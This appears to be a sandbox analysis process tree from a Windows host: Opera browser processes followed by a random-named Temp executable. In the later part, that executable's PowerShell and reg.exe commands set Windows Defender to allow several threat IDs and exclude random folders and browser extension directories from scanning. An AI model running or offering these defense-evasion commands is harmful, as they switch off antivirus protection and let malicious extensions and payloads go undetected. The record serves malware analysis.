C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6920,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6852,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7572 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=7040,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3916 /prefetch:92⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=3544,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6884,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-content-phase-1=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-3:GROW-2836 --field-trial-handle=6824,i,6806751875489055609,5761070681091256294,262144 --disable-features=CertificateTransparencyAskBeforeEnabling --variations-seed-version --mojo-platform-channel-handle=7620 /prefetch:142⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3192 -ip 31921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3192 -ip 31921⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004C41⤵
-
C:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exeC:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe --scheduledtask --bypasslauncher --requesttype=automatic --scheduledtask --enableipv6 --bypasslauncher --pipeid=oauc_task_pipedcbb8f53eff625f232ff45d7644762171⤵
-
C:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exeC:\Users\Admin\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff7e4c1465c,0x7ff7e4c14668,0x7ff7e4c146782⤵
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\72A8C838D015\installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\72A8C838D015\installer.exe" --version2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exeC:\Users\Admin\AppData\Local\Temp\MRB4foRz\5OnmJ1oL.exe RR /JTkEdidFhu 757674 /S1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DiQsdyKfwcNcwZtTcVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DiQsdyKfwcNcwZtTcVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtGdUAqPaeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtGdUAqPaeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jZYvVmedU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jZYvVmedU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mSxonuyZddWDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mSxonuyZddWDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSWBhTzYETvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSWBhTzYETvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jaTziRFwMbpUQIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jaTziRFwMbpUQIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\TLUiaIkgDaAGYJZgP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\TLUiaIkgDaAGYJZgP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XCjbzLTchVkZHDyu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XCjbzLTchVkZHDyu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DiQsdyKfwcNcwZtTcVR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DiQsdyKfwcNcwZtTcVR" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DiQsdyKfwcNcwZtTcVR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtGdUAqPaeUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
